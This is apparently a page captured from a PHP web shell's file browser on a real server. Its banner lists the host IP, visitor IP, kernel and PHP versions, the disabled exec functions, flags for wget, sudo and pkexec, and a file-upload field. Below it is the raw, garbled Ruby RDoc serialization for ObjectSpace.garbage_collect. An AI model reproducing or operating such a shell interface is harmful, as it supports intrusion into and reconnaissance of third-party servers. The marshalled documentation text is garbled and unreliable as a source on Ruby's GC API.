| Server IP : 162.214.74.102 / Your IP : 216.73.217.21 Web Server : Apache System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 User : lrsys ( 1015) PHP Version : 5.6.40 Disable Function : exec,passthru,shell_exec,system MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/opt/cpanel/ea-ruby24/root/usr/share/ri/system/ObjectSpace/ |
Upload File : |
U:RDoc::AnyMethod[iI"garbage_collect:ETI"!ObjectSpace::garbage_collect;TT:publico:RDoc::Markup::Document:@parts[
o:RDoc::Markup::Paragraph; [I"<Initiates garbage collection, unless manually disabled.;To:RDoc::Markup::BlankLine o;
; [I"HThis method is defined with keyword arguments that default to true:;T@o:RDoc::Markup::Verbatim; [I"?def GC.start(full_mark: true, immediate_sweep: true); end
;T:@format0o;
; [I"1Use full_mark: false to perform a minor GC. ;TI"CUse immediate_sweep: false to defer sweeping (use lazy sweep).;T@o;
; [I"RNote: These keyword arguments are implementation and version dependent. They ;TI"Kare not guaranteed to be future-compatible, and may be ignored if the ;TI"5underlying implementation does not support them.;T:
@fileI" gc.c;T:0@omit_headings_from_table_of_contents_below0I"DGC.start -> nil
ObjectSpace.garbage_collect -> nil
include GC; garbage_collect -> nil
GC.start(full_mark: true, immediate_sweep: true) -> nil
ObjectSpace.garbage_collect(full_mark: true, immediate_sweep: true) -> nil
include GC; garbage_collect(full_mark: true, immediate_sweep: true) -> nil
;T0[ I"(p1 = {});T@FI"ObjectSpace;TcRDoc::NormalModule00